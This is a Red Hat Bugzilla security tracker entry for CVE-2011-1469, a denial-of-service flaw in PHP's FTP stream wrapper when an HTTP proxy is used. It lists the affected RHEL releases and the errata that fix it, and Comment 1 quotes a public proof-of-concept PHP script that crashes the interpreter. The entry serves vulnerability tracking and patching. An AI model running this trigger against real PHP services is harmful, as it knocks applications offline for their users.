Bug 690905 (CVE-2011-1469)

Summary: CVE-2011-1469 php: DoS when using HTTP proxy with the FTP wrapper
Product: [Other] Security Response Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact: David Kutálek <dkutalek>
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: dkutalek, fedora, jorton, rpm, vdanen
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2012-01-19 22:23:41 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 740731, 740732, 740733, 740734, 768025, 769756, 831135    
Bug Blocks: 715030, 750552    

Description Jan Lieskovsky 2011-03-25 18:36:43 UTC 
Common Vulnerabilities and Exposures assigned an identifier CVE-2011-1469 to
the following vulnerability:

Unspecified vulnerability in the Streams component in PHP before 5.3.6
allows context-dependent attackers to cause a denial of service
(application crash) by accessing an ftp:// URL during use of an HTTP
proxy with the FTP wrapper.

References:
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1469
[2] http://bugs.php.net/bug.php?id=54092
[3] http://www.php.net/ChangeLog-5.php

Upstream patch:
[4] http://svn.php.net/viewvc/?view=revision&amp;revision=308734
Comment 1 Jan Lieskovsky 2011-03-25 18:38:34 UTC 
Public PoC from [2]:
====================
<?php

        $uri =
'ftp://pkg-shadow.alioth.debian.org/pub/pkg-shadow/shadow-4.1.4.3.tar.bz2';
        $proxy = 'tcp://proxy:8080';

        $opts = array(
                'ftp' => array(
                        'proxy' => $proxy
                )
        );

        $context = stream_context_create($opts);
        stream_context_set_params($context, array());

        $fh = fopen($uri, 'r', false, $context);
        while (!feof($fh)) {
                echo "foo\n";
                fread($fh, 4 * 1024);
        }

        fclose($fh);

?>
Comment 2 Jan Lieskovsky 2011-03-25 18:40:20 UTC 
This issue did NOT affect the version of the php package, as shipped
with Red Hat Enterprise Linux 4.

--

This issue affects the versions of the php package, as shipped with
Red Hat Enterprise Linux 5 and 6.

This issue affects the versions of the php53 package, as shipped with
Red Hat Enterprise Linux 5.

--

This issue does NOT affect the versions of the php package, as shipped
with Fedora release of 13 and 14 (particular package updates were already
scheduled).
Comment 6 errata-xmlrpc 2011-11-02 22:24:41 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5
  Red Hat Enterprise Linux 6

Via RHSA-2011:1423 https://rhn.redhat.com/errata/RHSA-2011-1423.html
Comment 7 Vincent Danen 2011-11-02 23:12:10 UTC 
Statement:

This issue did not affect the version of php as shipped with Red Hat Enterprise Linux 4.
Comment 9 errata-xmlrpc 2012-01-18 18:44:50 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2012:0033 https://rhn.redhat.com/errata/RHSA-2012-0033.html